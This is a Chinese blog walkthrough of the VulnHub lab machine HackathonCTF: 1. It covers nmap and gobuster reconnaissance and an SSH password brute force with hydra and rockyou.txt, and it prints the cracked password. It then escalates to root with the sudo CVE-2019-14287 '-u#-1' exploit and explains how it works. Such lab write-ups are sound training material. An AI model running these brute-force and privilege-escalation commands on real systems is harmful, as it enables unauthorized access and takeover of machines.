HackathonCTF: 1

最新推荐文章于 2025-09-14 17:15:07 发布
最新推荐文章于 2025-09-14 17:15:07 发布
阅读量513 收藏 5
点赞数 3
CC 4.0 BY-SA版权
文章标签: 网络安全 笔记 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhongyuekang820/article/details/151451967

HackathonCTF: 1

来自 <https://www.vulnhub.com/entry/hackathonctf-1,591/>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.128,靶场IP192.168.23.150

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.150

4,尝试匿名访问ftp服务器

ftp 192.168.23.150

再尝试访问80端口的http服务

应该是因为首页文件被禁止访问,扫描其子目录试试

gobuster dir -u http://192.168.23.150/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,txt,php,zip -b 404,403,400

http://192.168.23.150/robots.txt

robots.txt中得到提示

暴力破解7223端口ssh服务的账户密码

5,需要一步步找到账户密码,首先得到了用户名为test

http://192.168.23.150/sudo.html

view-source:http://192.168.23.150/ftc.html

用python把这些ascii码转换成相应的字母或者符号

s = "#117#115#101#32#114#111#99#107#121#111#117#46#116#120#116"

s1 = s.split('#')

s1.pop(0)  # 移除空字符串(因第一个字符是#)

for i in s1:

    print(chr(int(i)), end="")  # 移除多余的//end=""

6,确定下来使用rockyou.txt,开始爆破

hydra -l test -P /usr/share/wordlists/rockyou.txt ssh://192.168.23.150 -s 7223

成功爆破到该用户账户密码jordan23

7,ssh登录一下

ssh test@192.168.23.150 -p 7223

信息收集一下

然后再尝试提权或者横向移动

ctf用户可以任意使用sudo,那么就需要我变成这个用户以实现提权

8,分析发现sudo这个命令本身的版本过低,也是可以提权操作

sudo -u#-1 id -u

-u#-1 触发漏洞,把身份切换成 UID=0。输出应该是:0,表示已经是 root 用户。

sudo -u#-1 /bin/bash

直接启动一个 bash shell。因为 sudo 把 UID=4294967295 解析成 root (0),最终就是 root 权限的 shell。

漏洞原理(CVE-2019-14287)

  • 在 sudo 配置中,可能有一条规则允许用户以 任意 UID 身份运行命令,比如:
    user ALL=(ALL, !root) ALL
    这里表示:用户可以切换成任何人,但不能切换成 root。
  • 但是 sudo 的 UID 解析存在 bug:
    • 当你指定 -u#-1 时,sudo 会把它当成 UID 4294967295(无符号整数溢出)。
    • 内部转换时,这个值又会被映射为 0(root 的 UID)。
    • 结果:攻击者就能绕过 !root 限制,直接获取 root 身份。

freesec
关注
vulnhub之HACKATHONCTF: 1
weixin_44537595的博客
11-05 750
靶场:http://www.vulnhub.com/entry/hackathonctf-1,591/ 查看对方的主机mac地址 我们用我们的kali进行存活主机扫描 命令:nmap -sS -sC -sV -p1-10000 192.168.25.0/24 搜索到对方主机的ip地址为 192.168.25.84 3. 扫描对方所开放的端口及一些其他信息,并保存/tmp/下,文件名为nmap.txt 命令:nmap -A 192.168.25.84 -o /tmp/nmap.txt 4
vulnhub--HackathonCTF:2
venu_s的博客
06-22 361
靶机介绍 difficult:easy goal:get two flags download:https://www.vulnhub.com/entry/hackathonctf-2,714/ 信息探测 主机发现 端口扫描 查看端口的的详细信息,21端口可以使用anonymous身份登陆,有flag1.txt和word.dir两个文件;7223是ssh端口 目录扫描,有一个/happy 访问80端口,没什么发现,查看源代码,也没什么发现 访问/happy 查看源码,发现一个用户名 至此,网页的
vulnhub_HackathonCTF: 1
weixin_50698958的博客
11-06 567
靶机下载:点我 测试过程: 1、在本地启动靶场,设置网卡为VMnet8,自动获取IP,查看物理MAC 2、使用nmap扫描网段,找到IP为192.168.220.130 3、看到80端口开着,就尝试访问一下 报错,使用的是Apache服务器,版本2.4.7,百度一下存在Apache解析漏洞 4、使用御剑扫描一下后台目录,发现robots.txt 5、尝试访问一下robots.txt 发现base64加密内容 c3NoLWJydXRlZm9yY2Utc3Vkb2l0Cg==
Vulnhub-HACKATHONCTF: 2渗透
laoyanCZ的博客
01-06 1202
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉本文靶机下载连接-戳我直接下载!👈。
【Vulnhub 靶场】【HackathonCTF: 2】【简单】【20210620】
惟忆
12-03 636
靶场介绍:https://www.vulnhub.com/entry/hackathonctf-2,714/ 靶场下载:https://download.vulnhub.com/hackathonctf/Hackathon2.zip 靶场难度:简单 发布日期:2021年06月20日 文件大小:2.6 GB 靶场作者:somu sen 靶场系列:HackathonCTF 靶场描述:打靶耗时:1+小时,毫无难度,毫无卡顿,非常顺畅,基础中的基础
HACKATHONCTF_1靶场详解
weixin_44681307的博客
07-18 254
就用GPt搜索了一下,发现是个txt,这个txt是个密码字典,我猜测就是告诉我们后面需要爆破。登陆上以后sudo -l发现一个很奇怪的权限,就Google搜索了一下,发现可以一行代码提权。扫到ip后对ip进行一个单独扫描,发现开了四个端口,ssh设置到7223上了,这个很重要。打开网页主页是一个错误页面,就又对页面进行了一个扫描,发现有几个可以登陆的页面。在ftc.html页面中发现很多数字写在了源代码中,不知道有什么用。所以就用美杜莎爆破了一下,没想到很快密码就爆破出来了。密码:jordan23。
靶机渗透练习85-HackathonCTF 1
hirak0的博客
04-28 954
靶机描述 靶机地址:https://www.vulnhub.com/entry/hackathonctf-1,591/ Description N/A 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.3 靶机: IP地址:192.168.9.2 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 该靶机环境搭建如下 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式 将 VMware 中桥接模式网卡设置
HackathonCTF: 2靶场渗透
sucker的博客
09-11 406
4,这个版本的ftp服务器可能涉及高危漏洞,检索一下数据库是否存在漏洞利用文件。robots.txt 禁止访问 /*(全站限制爬虫,可能隐藏敏感路径):SSH 运行在非标准端口(默认 22,此处为 7223),版本较新。flag1.txt(大小 47 字节,可能是目标标识文件)word.dir(大小 849 字节,推测为密码字典)7,ssh登录hackathonll用户。5,访问80端口的http服务。3,对靶机进行端口服务探测。匿名登录成功,下载两个文件。获取一个可交互shell。查找提权手册进行提权。
Vulnhub: HackathonCTF: 2靶机
qq_43884092的博客
07-14 148
ftp存在匿名登陆,其中存在字典文件,网页源码提示用户名,配合字典文件爆破ssh,sudo提权
HACKATHONCTF 2靶机
logan_logan的博客
07-19 293
1.端口扫描 端口扫描发现FTP可以匿名登录,同时SSH登录端口被改为7223; 2.匿名登录FTP 登录成功之后发现两个文件,下载到本地进行打开; word.dir文件是以dir为后缀结尾,猜测这个文件是目录字典; 3.目录扫描 使用这个文件作为目录字典进行枚举; 成功枚举出happy目录,在网页打开,发现了一个用户名; 4.暴力破解 使用这个用户hackathonll进行暴力破解登录,尝试了好几个字典,最后还是用这个word.dir文件成功得出密码; 成功登录之后使用sudo -l发现vim可
2024年网络安全最新Vulnhub-HACKATHONCTF 2渗透
2401_84297899的博客
05-01 176
由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!👉本文靶机下载连接-戳我直接下载!👈。
vulnhub渗透测试题目Hackathon2
weixin_44687621的博客
07-29 451
vulnhub渗透测试题目Hackathon2 1.安装靶场环境 下载镜像文件:http://www.vulnhub.com/entry/hackathonctf-2,714/ 解压得到ovf文件 双击这个文件,用vmware打开,可以进行导入虚拟机操作 导入的虚拟机的网络适配器可以改为NAT模式 2.信息搜集 首先使用nmap扫描靶机的ip地址 我们kali本机的ip地址被分配为192.168.16.128,那么靶机的ip地址就应该是192.168.16.129了 接下来查看该靶机开放了哪些端口
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8771
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
docke笔记下篇
二月鸟
09-13 883
搜索镜像拉取镜像查看镜像启动镜像 - 服务端口映射停止容器移除容器从应用软件的角度来看,Dockerfile、Docker镜像与Docker容器分别代表软件的三个不同阶段,● Dockerfile是软件的原材料● Docker镜像是软件的交付品● Docker容器则可以认为是软件镜像的运行态,也即依照镜像运行的容器实例Dockerfile面向开发,Docker镜像成为交付标准,Docker容器则涉及部署与运维,三者缺一不可,合力充当Docker体系的基石。
迅为RK3588开发板Android系统开发笔记打包super.img
mucheni的博客
09-13 488
这个命令可以在编译 android 的时候通过编译 log 获取,log 保存在 out/verbose.log.*.gz 中,上面解包出来 super_ext4 目录下的 img 文件,需要重新打包成 super.img,在 super_ext4/生成的 super.img 镜像即可按照群文件手册《08【北京迅为】itop-3588 开发板快速烧写手。打包需要的工具 lpmake,工具在 out/host/linux-86/bin/lpmake。首先,确认各个 img 的大小。册》单独烧写进开发板。
CSS布局 - 定位 -- 笔记4
liu888663的博客
09-12 818
定位简介
PyCharm项目上传GitHub仓库(笔记
weixin_70530563的博客
09-11 899
本文总结如何将PyCharm中的本地项目上传至个人GitHub仓库,步骤清晰且覆盖关键配置点,适用于Git/GitHub新手。
fMoE论文阅读笔记
最新发布
ZHANG8023ZHEN的博客
09-14 259
而细颗粒度则是iteration level的。但是实验表明,粗颗粒度的expert heatmap被激活的更加均匀(熵更大)而且随着iteration的增加,expert被激活的就是更加均匀。主要原因是他们做的不够细,模型没有很好的被分门别类,导致真正需要使用的expert被错误的放到了CPU上,在使用expert的时候需要重新加载的时间。fMoE提出了expert-map,记录iteration级别输入的内容以及调取模型的情况,然后根据这张expert-map来决定experts offload。
AFSim2.9.0学习笔记 —— 4.1、创建项目,以此项目介绍工作中Wizard使用(红方/蓝方武器平台、阵营、更换图标等,多图详细介绍)
09-11 1312
AFSim2.9.0学习笔记 —— 4.1、创建项目,以此项目介绍工作中Wizard使用(红方/蓝方武器平台、阵营、更换图标等,多图详细介绍)
Kotlin协程详细笔记之切线程和挂起函数
罗春娥的技术园
09-12 287
对jvm上的Kotlin来说,协程是一个用线程来实现的并发管理库。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值